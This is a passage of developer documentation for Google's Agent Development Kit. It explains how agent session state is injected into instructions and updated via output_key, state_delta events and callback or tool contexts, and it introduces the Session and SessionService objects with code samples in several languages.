// The ADK will automatically inject the value of "topic" from the // session state into the instruction before calling the LLM. model, err := gemini.NewModel(ctx, modelID, nil) if err != nil { log.Fatalf("Failed to create Gemini model: %v", err) } storyGenerator, err := llmagent.New(llmagent.Config{ Name: "StoryGenerator", Model: model, Instruction: "Write a short story about a cat, focusing on the theme: {topic}.", }) if err != nil { log.Fatalf("Failed to create agent: %v", err) } r, err := runner.New(runner.Config{ AppName: appName, Agent: agent.Agent(storyGenerator), SessionService: sessionService, }) if err != nil { log.Fatalf("Failed to create runner: %v", err) } ``` #### Important Considerations - Key Existence: Ensure that the key you reference in the instruction string exists in the session.state. If the key is missing, the agent will throw an error. To use a key that may or may not be present, you can include a question mark (?) after the key (e.g. {topic?}). - Data Types: The value associated with the key should be a string or a type that can be easily converted to a string. - Escaping: If you need to use literal curly braces in your instruction (e.g., for JSON formatting), you'll need to escape them. #### Bypassing State Injection with `InstructionProvider` In some cases, you might want to use `{{` and `}}` literally in your instructions without triggering the state injection mechanism. For example, you might be writing instructions for an agent that helps with a templating language that uses the same syntax. To achieve this, you can provide a function to the `instruction` parameter instead of a string. This function is called an `InstructionProvider`. When you use an `InstructionProvider`, the ADK will not attempt to inject state, and your instruction string will be passed to the model as-is. 
The `InstructionProvider` function receives a `ReadonlyContext` object, which you can use to access session state or other contextual information if you need to build the instruction dynamically. ```python from google.adk.agents import LlmAgent from google.adk.agents.readonly_context import ReadonlyContext # This is an InstructionProvider def my_instruction_provider(context: ReadonlyContext) -> str: # You can optionally use the context to build the instruction # For this example, we'll return a static string with literal braces. return "This is an instruction with {{literal_braces}} that will not be replaced." agent = LlmAgent( model="gemini-2.0-flash", name="template_helper_agent", instruction=my_instruction_provider ) ``` ```typescript import { LlmAgent, ReadonlyContext } from "@google/adk"; // This is an InstructionProvider function myInstructionProvider(context: ReadonlyContext): string { // You can optionally use the context to build the instruction // For this example, we'll return a static string with literal braces. return "This is an instruction with {{literal_braces}} that will not be replaced."; } const agent = new LlmAgent({ model: "gemini-2.5-flash", name: "template_helper_agent", instruction: myInstructionProvider }); ``` ```go // 1. This InstructionProvider returns a static string. // Because it's a provider function, the ADK will not attempt to inject // state, and the instruction will be passed to the model as-is, // preserving the literal braces. func staticInstructionProvider(ctx agent.ReadonlyContext) (string, error) { return "This is an instruction with {{literal_braces}} that will not be replaced.", nil } ``` If you want to both use an `InstructionProvider` *and* inject state into your instructions, you can use the `inject_session_state` utility function. 
```python from google.adk.agents import LlmAgent from google.adk.agents.readonly_context import ReadonlyContext from google.adk.utils import instructions_utils async def my_dynamic_instruction_provider(context: ReadonlyContext) -> str: template = "This is a {adjective} instruction with {{literal_braces}}." # This will inject the 'adjective' state variable but leave the literal braces. return await instructions_utils.inject_session_state(template, context) agent = LlmAgent( model="gemini-2.0-flash", name="dynamic_template_helper_agent", instruction=my_dynamic_instruction_provider ) ``` ```go // 2. This InstructionProvider demonstrates how to manually inject state // while also preserving literal braces. It uses the instructionutil helper. func dynamicInstructionProvider(ctx agent.ReadonlyContext) (string, error) { template := "This is a {adjective} instruction with {{literal_braces}}." // This will inject the 'adjective' state variable but leave the literal braces. return instructionutil.InjectSessionState(ctx, template) } ``` **Benefits of Direct Injection** - Clarity: Makes it explicit which parts of the instruction are dynamic and based on session state. - Reliability: Avoids relying on the LLM to correctly interpret natural language instructions to access state. - Maintainability: Simplifies instruction strings and reduces the risk of errors when updating state variable names. **Relation to Other State Access Methods** This direct injection method is specific to LlmAgent instructions. Refer to the following section for more information on other state access methods. ### How State is Updated: Recommended Methods The Right Way to Modify State When you need to change the session state, the correct and safest method is to **directly modify the `state` object on the `Context`** provided to your function (e.g., `callback_context.state['my_key'] = 'new_value'`). 
This is the supported form of direct state manipulation, because the framework automatically tracks these changes.

This is critically different from directly modifying the `state` on a `Session` object you retrieve from the `SessionService` (e.g., `my_session.state['my_key'] = 'new_value'`). **You should avoid this**, as it bypasses the ADK's event tracking and can lead to lost data. The "Warning" section at the end of this page has more details on this important distinction.

State should **always** be updated as part of adding an `Event` to the session history using `session_service.append_event()`. This ensures changes are tracked, persistence works correctly, and updates are thread-safe.

**1. The Easy Way: `output_key` (for Agent Text Responses)**

This is the simplest method for saving an agent's final text response directly into the state. When defining your `LlmAgent`, specify the `output_key`:

```py
from google.adk.agents import LlmAgent
from google.adk.sessions import InMemorySessionService, Session
from google.adk.runners import Runner
from google.genai.types import Content, Part

# Define agent with output_key
greeting_agent = LlmAgent(
    name="Greeter",
    model="gemini-2.0-flash",  # Use a valid model
    instruction="Generate a short, friendly greeting.",
    output_key="last_greeting"  # Save response to state['last_greeting']
)

# --- Setup Runner and Session ---
app_name, user_id, session_id = "state_app", "user1", "session1"
session_service = InMemorySessionService()
runner = Runner(
    agent=greeting_agent,
    app_name=app_name,
    session_service=session_service
)
session = await session_service.create_session(app_name=app_name,
                                               user_id=user_id,
                                               session_id=session_id)
print(f"Initial state: {session.state}")

# --- Run the Agent ---
# Runner handles calling append_event, which uses the output_key
# to automatically create the state_delta.
user_message = Content(parts=[Part(text="Hello")])
for event in runner.run(user_id=user_id,
                        session_id=session_id,
                        new_message=user_message):
    if event.is_final_response():
        print("Agent responded.")  # Response text is also in event.content

# --- Check Updated State ---
updated_session = await session_service.get_session(app_name=app_name, user_id=user_id, session_id=session_id)
print(f"State after agent run: {updated_session.state}")
# Expected output might include: {'last_greeting': 'Hello there! How can I help you today?'}
```

```typescript
import { LlmAgent, Runner, InMemorySessionService, isFinalResponse } from "@google/adk";
import { Content } from "@google/genai";

// Define agent with outputKey
const greetingAgent = new LlmAgent({
    name: "Greeter",
    model: "gemini-2.5-flash",
    instruction: "Generate a short, friendly greeting.",
    outputKey: "last_greeting" // Save response to state['last_greeting']
});

// --- Setup Runner and Session ---
const appName = "state_app";
const userId = "user1";
const sessionId = "session1";
const sessionService = new InMemorySessionService();
const runner = new Runner({
    agent: greetingAgent,
    appName: appName,
    sessionService: sessionService
});
const session = await sessionService.createSession({
    appName,
    userId,
    sessionId
});
console.log(`Initial state: ${JSON.stringify(session.state)}`);

// --- Run the Agent ---
// Runner handles calling appendEvent, which uses the outputKey
// to automatically create the stateDelta.
const userMessage: Content = { parts: [{ text: "Hello" }] };
for await (const event of runner.runAsync({
    userId,
    sessionId,
    newMessage: userMessage
})) {
    if (isFinalResponse(event)) {
        console.log("Agent responded."); // Response text is also in event.content
    }
}

// --- Check Updated State ---
const updatedSession = await sessionService.getSession({ appName, userId, sessionId });
console.log(`State after agent run: ${JSON.stringify(updatedSession?.state)}`);
// Expected output might include: {"last_greeting":"Hello there!
How can I help you today?"} ``` ```go // 1. GreetingAgent demonstrates using `OutputKey` to save an agent's // final text response directly into the session state. func greetingAgentExample(sessionService session.Service) { fmt.Println("--- Running GreetingAgent (output_key) Example ---") ctx := context.Background() modelGreeting, err := gemini.NewModel(ctx, modelID, nil) if err != nil { log.Fatalf("Failed to create Gemini model for greeting agent: %v", err) } greetingAgent, err := llmagent.New(llmagent.Config{ Name: "Greeter", Model: modelGreeting, Instruction: "Generate a short, friendly greeting.", OutputKey: "last_greeting", }) if err != nil { log.Fatalf("Failed to create greeting agent: %v", err) } r, err := runner.New(runner.Config{ AppName: appName, Agent: agent.Agent(greetingAgent), SessionService: sessionService, }) if err != nil { log.Fatalf("Failed to create runner: %v", err) } // Run the agent userMessage := genai.NewContentFromText("Hello", "user") for event, err := range r.Run(ctx, userID, sessionID, userMessage, agent.RunConfig{}) { if err != nil { log.Printf("Agent Error: %v", err) continue } if isFinalResponse(event) { if event.LLMResponse.Content != nil { fmt.Printf("Agent responded with: %q\n", textParts(event.LLMResponse.Content)) } else { fmt.Println("Agent responded.") } } } // Check the updated state resp, err := sessionService.Get(ctx, &session.GetRequest{AppName: appName, UserID: userID, SessionID: sessionID}) if err != nil { log.Fatalf("Failed to get session: %v", err) } lastGreeting, _ := resp.Session.State().Get("last_greeting") fmt.Printf("State after agent run: last_greeting = %q\n\n", lastGreeting) } ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.agents.RunConfig; import com.google.adk.events.Event; import com.google.adk.runner.Runner; import com.google.adk.sessions.InMemorySessionService; import com.google.adk.sessions.Session; import com.google.genai.types.Content; import com.google.genai.types.Part; import 
java.util.List; import java.util.Optional; public class GreetingAgentExample { public static void main(String[] args) { // Define agent with output_key LlmAgent greetingAgent = LlmAgent.builder() .name("Greeter") .model("gemini-2.0-flash") .instruction("Generate a short, friendly greeting.") .description("Greeting agent") .outputKey("last_greeting") // Save response to state['last_greeting'] .build(); // --- Setup Runner and Session --- String appName = "state_app"; String userId = "user1"; String sessionId = "session1"; InMemorySessionService sessionService = new InMemorySessionService(); Runner runner = new Runner(greetingAgent, appName, null, sessionService); // artifactService can be null if not used Session session = sessionService.createSession(appName, userId, null, sessionId).blockingGet(); System.out.println("Initial state: " + session.state().entrySet()); // --- Run the Agent --- // Runner handles calling appendEvent, which uses the output_key // to automatically create the stateDelta. Content userMessage = Content.builder().parts(List.of(Part.fromText("Hello"))).build(); // RunConfig is needed for runner.runAsync in Java RunConfig runConfig = RunConfig.builder().build(); for (Event event : runner.runAsync(userId, sessionId, userMessage, runConfig).blockingIterable()) { if (event.finalResponse()) { System.out.println("Agent responded."); // Response text is also in event.content } } // --- Check Updated State --- Session updatedSession = sessionService.getSession(appName, userId, sessionId, Optional.empty()).blockingGet(); assert updatedSession != null; System.out.println("State after agent run: " + updatedSession.state().entrySet()); // Expected output might include: {'last_greeting': 'Hello there! How can I help you today?'} } } ``` Behind the scenes, the `Runner` uses the `output_key` to create the necessary `EventActions` with a `state_delta` and calls `append_event`. **2. 
The Standard Way: `EventActions.state_delta` (for Complex Updates)** For more complex scenarios (updating multiple keys, non-string values, specific scopes like `user:` or `app:`, or updates not tied directly to the agent's final text), you manually construct the `state_delta` within `EventActions`. ```py from google.adk.sessions import InMemorySessionService, Session from google.adk.events import Event, EventActions from google.genai.types import Part, Content import time # --- Setup --- session_service = InMemorySessionService() app_name, user_id, session_id = "state_app_manual", "user2", "session2" session = await session_service.create_session( app_name=app_name, user_id=user_id, session_id=session_id, state={"user:login_count": 0, "task_status": "idle"} ) print(f"Initial state: {session.state}") # --- Define State Changes --- current_time = time.time() state_changes = { "task_status": "active", # Update session state "user:login_count": session.state.get("user:login_count", 0) + 1, # Update user state "user:last_login_ts": current_time, # Add user state "temp:validation_needed": True # Add temporary state (will be discarded) } # --- Create Event with Actions --- actions_with_update = EventActions(state_delta=state_changes) # This event might represent an internal system action, not just an agent response system_event = Event( invocation_id="inv_login_update", author="system", # Or 'agent', 'tool' etc. 
actions=actions_with_update, timestamp=current_time # content might be None or represent the action taken ) # --- Append the Event (This updates the state) --- await session_service.append_event(session, system_event) print("`append_event` called with explicit state delta.") # --- Check Updated State --- updated_session = await session_service.get_session(app_name=app_name, user_id=user_id, session_id=session_id) print(f"State after event: {updated_session.state}") # Expected: {'user:login_count': 1, 'task_status': 'active', 'user:last_login_ts': } # Note: 'temp:validation_needed' is NOT present. ``` ```typescript import { InMemorySessionService, createEvent, createEventActions } from "@google/adk"; // --- Setup --- const sessionService = new InMemorySessionService(); const appName = "state_app_manual"; const userId = "user2"; const sessionId = "session2"; const session = await sessionService.createSession({ appName, userId, sessionId, state: { "user:login_count": 0, "task_status": "idle" } }); console.log(`Initial state: ${JSON.stringify(session.state)}`); // --- Define State Changes --- const currentTime = Date.now(); const stateChanges = { "task_status": "active", // Update session state "user:login_count": (session.state["user:login_count"] as number || 0) + 1, // Update user state "user:last_login_ts": currentTime, // Add user state "temp:validation_needed": true // Add temporary state (will be discarded) }; // --- Create Event with Actions --- const actionsWithUpdate = createEventActions({ stateDelta: stateChanges, }); // This event might represent an internal system action, not just an agent response const systemEvent = createEvent({ invocationId: "inv_login_update", author: "system", // Or 'agent', 'tool' etc. 
actions: actionsWithUpdate, timestamp: currentTime // content might be null or represent the action taken }); // --- Append the Event (This updates the state) --- await sessionService.appendEvent({ session, event: systemEvent }); console.log("`appendEvent` called with explicit state delta."); // --- Check Updated State --- const updatedSession = await sessionService.getSession({ appName, userId, sessionId }); console.log(`State after event: ${JSON.stringify(updatedSession?.state)}`); // Expected: {"user:login_count":1,"task_status":"active","user:last_login_ts":} // Note: 'temp:validation_needed' is NOT present. ``` ```go // 2. manualStateUpdateExample demonstrates creating an event with explicit // state changes (a "state_delta") to update multiple keys, including // those with user- and temp- prefixes. func manualStateUpdateExample(sessionService session.Service) { fmt.Println("--- Running Manual State Update (EventActions) Example ---") ctx := context.Background() s, err := sessionService.Get(ctx, &session.GetRequest{AppName: appName, UserID: userID, SessionID: sessionID}) if err != nil { log.Fatalf("Failed to get session: %v", err) } retrievedSession := s.Session // Define state changes loginCount, _ := retrievedSession.State().Get("user:login_count") newLoginCount := 1 if lc, ok := loginCount.(int); ok { newLoginCount = lc + 1 } stateChanges := map[string]any{ "task_status": "active", "user:login_count": newLoginCount, "user:last_login_ts": time.Now().Unix(), "temp:validation_needed": true, } // Create an event with the state changes systemEvent := session.NewEvent("inv_login_update") systemEvent.Author = "system" systemEvent.Actions.StateDelta = stateChanges // Append the event to update the state if err := sessionService.AppendEvent(ctx, retrievedSession, systemEvent); err != nil { log.Fatalf("Failed to append event: %v", err) } fmt.Println("`append_event` called with explicit state delta.") // Check the updated state updatedResp, err := 
sessionService.Get(ctx, &session.GetRequest{AppName: appName, UserID: userID, SessionID: sessionID}) if err != nil { log.Fatalf("Failed to get session: %v", err) } taskStatus, _ := updatedResp.Session.State().Get("task_status") loginCount, _ = updatedResp.Session.State().Get("user:login_count") lastLogin, _ := updatedResp.Session.State().Get("user:last_login_ts") temp, err := updatedResp.Session.State().Get("temp:validation_needed") // This should fail or be nil fmt.Printf("State after event: task_status=%q, user:login_count=%v, user:last_login_ts=%v\n", taskStatus, loginCount, lastLogin) if err != nil { fmt.Printf("As expected, temp state was not persisted: %v\n\n", err) } else { fmt.Printf("Unexpected temp state value: %v\n\n", temp) } } ``` ```java import com.google.adk.events.Event; import com.google.adk.events.EventActions; import com.google.adk.sessions.InMemorySessionService; import com.google.adk.sessions.Session; import java.time.Instant; import java.util.Optional; import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.ConcurrentMap; public class ManualStateUpdateExample { public static void main(String[] args) { // --- Setup --- InMemorySessionService sessionService = new InMemorySessionService(); String appName = "state_app_manual"; String userId = "user2"; String sessionId = "session2"; ConcurrentMap initialState = new ConcurrentHashMap<>(); initialState.put("user:login_count", 0); initialState.put("task_status", "idle"); Session session = sessionService.createSession(appName, userId, initialState, sessionId).blockingGet(); System.out.println("Initial state: " + session.state().entrySet()); // --- Define State Changes --- long currentTimeMillis = Instant.now().toEpochMilli(); // Use milliseconds for Java Event ConcurrentMap stateChanges = new ConcurrentHashMap<>(); stateChanges.put("task_status", "active"); // Update session state // Retrieve and increment login_count Object loginCountObj = session.state().get("user:login_count"); 
int currentLoginCount = 0; if (loginCountObj instanceof Number) { currentLoginCount = ((Number) loginCountObj).intValue(); } stateChanges.put("user:login_count", currentLoginCount + 1); // Update user state stateChanges.put("user:last_login_ts", currentTimeMillis); // Add user state (as long milliseconds) stateChanges.put("temp:validation_needed", true); // Add temporary state // --- Create Event with Actions --- EventActions actionsWithUpdate = EventActions.builder().stateDelta(stateChanges).build(); // This event might represent an internal system action, not just an agent response Event systemEvent = Event.builder() .invocationId("inv_login_update") .author("system") // Or 'agent', 'tool' etc. .actions(actionsWithUpdate) .timestamp(currentTimeMillis) // content might be None or represent the action taken .build(); // --- Append the Event (This updates the state) --- sessionService.appendEvent(session, systemEvent).blockingGet(); System.out.println("`appendEvent` called with explicit state delta."); // --- Check Updated State --- Session updatedSession = sessionService.getSession(appName, userId, sessionId, Optional.empty()).blockingGet(); assert updatedSession != null; System.out.println("State after event: " + updatedSession.state().entrySet()); // Expected: {'user:login_count': 1, 'task_status': 'active', 'user:last_login_ts': } // Note: 'temp:validation_needed' is NOT present because InMemorySessionService's appendEvent // applies delta to its internal user/app state maps IF keys have prefixes, // and to the session's own state map (which is then merged on getSession). } } ``` **3. Via `CallbackContext` or `ToolContext` (Recommended for Callbacks and Tools)** Modifying state within agent callbacks (e.g., `on_before_agent_call`, `on_after_agent_call`) or tool functions is best done using the `state` attribute of the `CallbackContext` or `ToolContext` provided to your function. 
- `callback_context.state['my_key'] = my_value` - `tool_context.state['my_key'] = my_value` These context objects are specifically designed to manage state changes within their respective execution scopes. When you modify `context.state`, the ADK framework ensures that these changes are automatically captured and correctly routed into the `EventActions.state_delta` for the event being generated by the callback or tool. This delta is then processed by the `SessionService` when the event is appended, ensuring proper persistence and tracking. This method abstracts away the manual creation of `EventActions` and `state_delta` for most common state update scenarios within callbacks and tools, making your code cleaner and less error-prone. For more comprehensive details on context objects, refer to the [Context documentation](https://google.github.io/adk-docs/context/index.md). ```python # In an agent callback or tool function from google.adk.agents import CallbackContext # or ToolContext def my_callback_or_tool_function(context: CallbackContext, # Or ToolContext # ... other parameters ... ): # Update existing state count = context.state.get("user_action_count", 0) context.state["user_action_count"] = count + 1 # Add new state context.state["temp:last_operation_status"] = "success" # State changes are automatically part of the event's state_delta # ... rest of callback/tool logic ... ``` ```typescript // In an agent callback or tool function import { CallbackContext } from "@google/adk"; // or ToolContext function myCallbackOrToolFunction( context: CallbackContext, // Or ToolContext // ... other parameters ... ) { // Update existing state const count = context.state.get("user_action_count", 0); context.state.set("user_action_count", count + 1); // Add new state context.state.set("temp:last_operation_status", "success"); // State changes are automatically part of the event's stateDelta // ... rest of callback/tool logic ... } ``` ```go // 3. 
contextStateUpdateExample demonstrates the recommended way to modify state // from within a tool function using the provided `tool.Context`. func contextStateUpdateExample(sessionService session.Service) { fmt.Println("--- Running Context State Update (ToolContext) Example ---") ctx := context.Background() // Define the tool that modifies state updateActionCountTool, err := functiontool.New( functiontool.Config{Name: "update_action_count", Description: "Updates the user action count in the state."}, func(tctx tool.Context, args struct{}) (struct{}, error) { actx, ok := tctx.(agent.CallbackContext) if !ok { log.Fatalf("tool.Context is not of type agent.CallbackContext") } s, err := actx.State().Get("user_action_count") if err != nil { log.Printf("could not get user_action_count: %v", err) } newCount := 1 if c, ok := s.(int); ok { newCount = c + 1 } if err := actx.State().Set("user_action_count", newCount); err != nil { log.Printf("could not set user_action_count: %v", err) } if err := actx.State().Set("temp:last_operation_status", "success from tool"); err != nil { log.Printf("could not set temp:last_operation_status: %v", err) } fmt.Println("Tool: Updated state via agent.CallbackContext.") return struct{}{}, nil }, ) if err != nil { log.Fatalf("Failed to create tool: %v", err) } // Define an agent that uses the tool modelTool, err := gemini.NewModel(ctx, modelID, nil) if err != nil { log.Fatalf("Failed to create Gemini model for tool agent: %v", err) } toolAgent, err := llmagent.New(llmagent.Config{ Name: "ToolAgent", Model: modelTool, Instruction: "Use the update_action_count tool.", Tools: []tool.Tool{updateActionCountTool}, }) if err != nil { log.Fatalf("Failed to create tool agent: %v", err) } r, err := runner.New(runner.Config{ AppName: appName, Agent: agent.Agent(toolAgent), SessionService: sessionService, }) if err != nil { log.Fatalf("Failed to create runner: %v", err) } // Run the agent to trigger the tool userMessage := genai.NewContentFromText("Please 
update the action count.", "user") for _, err := range r.Run(ctx, userID, sessionID, userMessage, agent.RunConfig{}) { if err != nil { log.Printf("Agent Error: %v", err) } } // Check the updated state resp, err := sessionService.Get(ctx, &session.GetRequest{AppName: appName, UserID: userID, SessionID: sessionID}) if err != nil { log.Fatalf("Failed to get session: %v", err) } actionCount, _ := resp.Session.State().Get("user_action_count") fmt.Printf("State after tool run: user_action_count = %v\n", actionCount) } ``` ```java // In an agent callback or tool method import com.google.adk.agents.CallbackContext; // or ToolContext // ... other imports ... public class MyAgentCallbacks { public void onAfterAgent(CallbackContext callbackContext) { // Update existing state Integer count = (Integer) callbackContext.state().getOrDefault("user_action_count", 0); callbackContext.state().put("user_action_count", count + 1); // Add new state callbackContext.state().put("temp:last_operation_status", "success"); // State changes are automatically part of the event's state_delta // ... rest of callback logic ... } } ``` **What `append_event` Does:** - Adds the `Event` to `session.events`. - Reads the `state_delta` from the event's `actions`. - Applies these changes to the state managed by the `SessionService`, correctly handling prefixes and persistence based on the service type. - Updates the session's `last_update_time`. - Ensures thread-safety for concurrent updates. ### ⚠️ A Warning About Direct State Modification Avoid directly modifying the `session.state` collection (dictionary/Map) on a `Session` object that was obtained directly from the `SessionService` (e.g., via `session_service.get_session()` or `session_service.create_session()`) *outside* of the managed lifecycle of an agent invocation (i.e., not through a `CallbackContext` or `ToolContext`). 
For example, code like `retrieved_session = await session_service.get_session(...); retrieved_session.state['key'] = value` is problematic. State modifications *within* callbacks or tools using `CallbackContext.state` or `ToolContext.state` are the correct way to ensure changes are tracked, as these context objects handle the necessary integration with the event system. **Why direct modification (outside of contexts) is strongly discouraged:** 1. **Bypasses Event History:** The change isn't recorded as an `Event`, losing auditability. 1. **Breaks Persistence:** Changes made this way **will likely NOT be saved** by `DatabaseSessionService` or `VertexAiSessionService`. They rely on `append_event` to trigger saving. 1. **Not Thread-Safe:** Can lead to race conditions and lost updates. 1. **Ignores Timestamps/Logic:** Doesn't update `last_update_time` or trigger related event logic. **Recommendation:** Stick to updating state via `output_key`, `EventActions.state_delta` (when manually creating events), or by modifying the `state` property of `CallbackContext` or `ToolContext` objects when within their respective scopes. These methods ensure reliable, trackable, and persistent state management. Use direct access to `session.state` (from a `SessionService`-retrieved session) only for *reading* state. ### Best Practices for State Design Recap - **Minimalism:** Store only essential, dynamic data. - **Serialization:** Use basic, serializable types. - **Descriptive Keys & Prefixes:** Use clear names and appropriate prefixes (`user:`, `app:`, `temp:`, or none). - **Shallow Structures:** Avoid deep nesting where possible. - **Standard Update Flow:** Rely on `append_event`. # Session: Tracking Individual Conversations Supported in ADKPython v0.1.0Typescript v0.2.0Go v0.1.0Java v0.1.0 Following our Introduction, let's dive into the `Session`. Think back to the idea of a "conversation thread." 
Just like you wouldn't start every text message from scratch, agents need context about the ongoing interaction. **`Session`** is the ADK object designed specifically to track and manage these individual conversation threads.

## The `Session` Object

When a user starts interacting with your agent, the `SessionService` creates a `Session` object (`google.adk.sessions.Session`). This object acts as the container holding everything related to that *one specific chat thread*. Here are its key properties, shown with their Python names (the TypeScript and Java examples use camelCase equivalents such as `appName`, `userId`, and `lastUpdateTime`):

- **Identification (`id`, `app_name`, `user_id`):** Unique labels for the conversation.
    - `id`: A unique identifier for *this specific* conversation thread, essential for retrieving it later. A single `SessionService` can handle many `Session` objects, and this field identifies which one is meant. For example, "test_id_modification".
    - `app_name`: Identifies which agent application this conversation belongs to. For example, "id_modifier_workflow".
    - `user_id`: Links the conversation to a particular user.
- **History (`events`):** A chronological sequence of all interactions (`Event` objects: user messages, agent responses, tool actions) that have occurred within this specific thread.
- **Session State (`state`):** A place to store temporary data relevant *only* to this specific, ongoing conversation. This acts as a scratchpad for the agent during the interaction. We will cover how to use and manage `state` in detail in the next section.
- **Activity Tracking (`last_update_time`):** A timestamp indicating the last time an event occurred in this conversation thread.
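
To make the role of the identification fields concrete, here is a minimal, framework-free sketch. `ToySession`, `store`, `create_session`, and `get_session` are hypothetical names invented for illustration and are not part of ADK; the sketch only assumes that a session is looked up by the combination of application name, user ID, and session ID.

```python
import time
import uuid
from dataclasses import dataclass, field
from typing import Any, Dict, List, Optional, Tuple


@dataclass
class ToySession:
    """Hypothetical stand-in that mirrors the properties listed above."""

    app_name: str
    user_id: str
    id: str = field(default_factory=lambda: uuid.uuid4().hex)
    state: Dict[str, Any] = field(default_factory=dict)
    events: List[Any] = field(default_factory=list)
    last_update_time: float = field(default_factory=time.time)


# One store can hold many sessions; the (app_name, user_id, id) triple selects one.
store: Dict[Tuple[str, str, str], ToySession] = {}


def create_session(
    app_name: str, user_id: str, session_id: Optional[str] = None
) -> ToySession:
    """Create a session, generating an ID when the caller does not supply one."""
    session = ToySession(app_name=app_name, user_id=user_id)
    if session_id is not None:
        session.id = session_id
    store[(app_name, user_id, session.id)] = session
    return session


def get_session(app_name: str, user_id: str, session_id: str) -> Optional[ToySession]:
    """Return the matching session, or None if the triple is unknown."""
    return store.get((app_name, user_id, session_id))


if __name__ == "__main__":
    first = create_session("my_app", "alice", "s1")
    second = create_session("my_app", "alice", "s2")
    print(get_session("my_app", "alice", "s1") is first)
    print(get_session("my_app", "bob", "s1"))
```

The same user can hold several sessions in one application, which is why the session `id` is needed in addition to `app_name` and `user_id`.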
### Example: Examining Session Properties ```py from google.adk.sessions import InMemorySessionService, Session # Create a simple session to examine its properties temp_service = InMemorySessionService() example_session = await temp_service.create_session( app_name="my_app", user_id="example_user", state={"initial_key": "initial_value"} # State can be initialized ) print("--- Examining Session Properties ---") print(f"ID (`id`): {example_session.id}") print(f"Application Name (`app_name`): {example_session.app_name}") print(f"User ID (`user_id`): {example_session.user_id}") print(f"State (`state`): {example_session.state}") # Note: Only shows initial state here print(f"Events (`events`): {example_session.events}") # Initially empty print(f"Last Update (`last_update_time`): {example_session.last_update_time:.2f}") print("---------------------------------") # Clean up (optional for this example). Do not reassign temp_service to the result of delete_session. await temp_service.delete_session(app_name=example_session.app_name, user_id=example_session.user_id, session_id=example_session.id) print("Session deleted.") ``` ```typescript import { InMemorySessionService } from "@google/adk"; // Create a simple session to examine its properties const tempService = new InMemorySessionService(); const exampleSession = await tempService.createSession({ appName: "my_app", userId: "example_user", state: {"initial_key": "initial_value"} // State can be initialized }); console.log("--- Examining Session Properties ---"); console.log(`ID ('id'): ${exampleSession.id}`); console.log(`Application Name ('appName'): ${exampleSession.appName}`); console.log(`User ID ('userId'): ${exampleSession.userId}`); console.log(`State ('state'): ${JSON.stringify(exampleSession.state)}`); // Note: Only shows initial state here console.log(`Events ('events'): ${JSON.stringify(exampleSession.events)}`); // Initially empty console.log(`Last Update ('lastUpdateTime'): ${exampleSession.lastUpdateTime}`); 
console.log("---------------------------------"); // Clean up (optional for this example) const finalStatus = await tempService.deleteSession({ appName: exampleSession.appName, userId: exampleSession.userId, sessionId: exampleSession.id }); console.log("The final status of temp_service - ", finalStatus); ``` ```go appName := "my_go_app" userID := "example_go_user" initialState := map[string]any{"initial_key": "initial_value"} // Create a session to examine its properties. createResp, err := inMemoryService.Create(ctx, &session.CreateRequest{ AppName: appName, UserID: userID, State: initialState, }) if err != nil { log.Fatalf("Failed to create session: %v", err) } exampleSession := createResp.Session fmt.Println("\n--- Examining Session Properties ---") fmt.Printf("ID (`ID()`): %s\n", exampleSession.ID()) fmt.Printf("Application Name (`AppName()`): %s\n", exampleSession.AppName()) // To access state, you call Get(). val, _ := exampleSession.State().Get("initial_key") fmt.Printf("State (`State().Get()`): initial_key = %v\n", val) // Events are initially empty. fmt.Printf("Events (`Events().Len()`): %d\n", exampleSession.Events().Len()) fmt.Printf("Last Update (`LastUpdateTime()`): %s\n", exampleSession.LastUpdateTime().Format("2006-01-02 15:04:05")) fmt.Println("---------------------------------") // Clean up the session. 
err = inMemoryService.Delete(ctx, &session.DeleteRequest{ AppName: exampleSession.AppName(), UserID: exampleSession.UserID(), SessionID: exampleSession.ID(), }) if err != nil { log.Fatalf("Failed to delete session: %v", err) } fmt.Println("Session deleted successfully.") ``` ```java import com.google.adk.sessions.InMemorySessionService; import com.google.adk.sessions.Session; import java.util.Map; import java.util.Optional; import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.ConcurrentMap; String sessionId = "123"; String appName = "example-app"; // Example app name String userId = "example-user"; // Example user id ConcurrentMap<String, Object> initialState = new ConcurrentHashMap<>(Map.of("newKey", "newValue")); InMemorySessionService exampleSessionService = new InMemorySessionService(); // Create Session Session exampleSession = exampleSessionService.createSession( appName, userId, initialState, Optional.of(sessionId)).blockingGet(); System.out.println("Session created successfully."); System.out.println("--- Examining Session Properties ---"); System.out.printf("ID (`id`): %s%n", exampleSession.id()); System.out.printf("Application Name (`appName`): %s%n", exampleSession.appName()); System.out.printf("User ID (`userId`): %s%n", exampleSession.userId()); System.out.printf("State (`state`): %s%n", exampleSession.state()); System.out.println("------------------------------------"); // Clean up (optional for this example) var unused = exampleSessionService.deleteSession(appName, userId, sessionId); ``` *(**Note:** The state shown above is only the initial state. State updates happen via events, as discussed in the State section.)* ## Managing Sessions with a `SessionService` As seen above, you don't typically create or manage `Session` objects directly. Instead, you use a **`SessionService`**. This service acts as the central manager responsible for the entire lifecycle of your conversation sessions. 
Its core responsibilities include: - **Starting New Conversations:** Creating fresh `Session` objects when a user begins an interaction. - **Resuming Existing Conversations:** Retrieving a specific `Session` (using its ID) so the agent can continue where it left off. - **Saving Progress:** Appending new interactions (`Event` objects) to a session's history. This is also the mechanism through which session `state` gets updated (more in the `State` section). - **Listing Conversations:** Finding the active session threads for a particular user and application. - **Cleaning Up:** Deleting `Session` objects and their associated data when conversations are finished or no longer needed. ## `SessionService` implementations ADK provides different `SessionService` implementations, allowing you to choose the storage backend that best suits your needs: ### `InMemorySessionService` - **How it works:** Stores all session data directly in the application's memory. - **Persistence:** None. **All conversation data is lost if the application restarts.** - **Requires:** Nothing extra. - **Best for:** Quick development, local testing, examples, and scenarios where long-term persistence isn't required. ```py from google.adk.sessions import InMemorySessionService session_service = InMemorySessionService() ``` ```typescript import { InMemorySessionService } from "@google/adk"; const sessionService = new InMemorySessionService(); ``` ```go import "google.golang.org/adk/session" inMemoryService := session.InMemoryService() ``` ```java import com.google.adk.sessions.InMemorySessionService; InMemorySessionService exampleSessionService = new InMemorySessionService(); ``` ### `VertexAiSessionService` Supported in ADKPython v0.1.0Go v0.1.0Java v0.1.0 - **How it works:** Uses Google Cloud Vertex AI infrastructure via API calls for session management. - **Persistence:** Yes. Data is managed reliably and scalably via [Vertex AI Agent Engine](https://google.github.io/adk-docs/deploy/agent-engine/). 
